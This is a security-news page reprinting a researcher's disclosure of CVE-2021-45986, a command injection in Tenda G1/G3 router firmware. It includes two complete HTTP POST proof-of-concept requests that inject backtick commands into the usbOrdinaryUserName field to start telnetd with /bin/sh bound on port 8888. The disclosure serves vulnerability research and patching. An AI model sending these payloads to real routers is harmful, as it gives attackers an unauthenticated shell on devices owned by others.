Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2021-45986: my_vuln/2.md at main · pjqwudi/my_vuln

Tenda routers G1 and G3 v15.11.0.17(9502)_CN were discovered to contain a command injection vulnerability in the function formSetUSBShareInfo. This vulnerability allows attackers to execute arbitrary commands via the usbOrdinaryUserName parameter.

CVE
Open in Source
#vulnerability#ubuntu#linux#git

Tenda Vulnerability

Vendor:Tenda

Product:G1、G3

Version:V15.11.0.17(9502)_CN(Download Link:https://www.tenda.com.cn/download/detail-3108.html)

Type:Remote Command Execution

Author:Jiaqian Peng

Institution:[email protected]

Vulnerability description

We found an Command Injection vulnerability in Tenda router with firmware which was released recently, allows remote attackers to execute arbitrary OS commands from a crafted request.

Remote Command Execution

In httpd binary:

In formSetUSBShareInfo function, usbOrdinaryUserName is directly passed by the attacker, so we can control the usbOrdinaryUserName to attack the OS.

As you can see here, the input has not been checked. And then, call the function setValueIfNotNull to store this input.

In netctrl binary:

In samba_change_cfg function, the initial input will be extracted and cause command injection.

Supplement

In order to avoid such problems, we believe that the string content should be checked in the input extraction part.

PoC

We set usbOrdinaryUserName as /usr/sbin/telnetdguest , and the router will excute it,such as:

POST /goform/setUSB HTTP/1.1 Host: 192.168.1.252 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: text/plain, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 124 Origin: http://192.168.1.252 Connection: close Referer: http://192.168.1.252/USB/usbFileShare.html?0.38914363317516376 Cookie: _:USERNAME:_=; G3v3_user=

usbPrivilegedUserName=admin&usbPrivilegedUserPwd=admin&usbOrdinaryUserName=`/usr/sbin/telnetd`guest&usbOrdinaryUserPwd=guest

We set usbOrdinaryUserName as telnetd -l /bin/sh -p 8888 -b 0.0.0.0guest , and the router will excute it,such as:

POST /goform/setUSB HTTP/1.1 Host: 192.168.1.252 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: text/plain, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 144 Origin: http://192.168.1.252 Connection: close Referer: http://192.168.1.252/USB/usbFileShare.html?0.38914363317516376 Cookie: _:USERNAME:_=; G3v3_user=

usbPrivilegedUserName=admin&usbPrivilegedUserPwd=admin&usbOrdinaryUserName=`telnetd -l /bin/sh -p 8888 -b 0.0.0.0`guest&usbOrdinaryUserPwd=guest

Result

The target router has enabled the telnet service.

Get a shell!

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE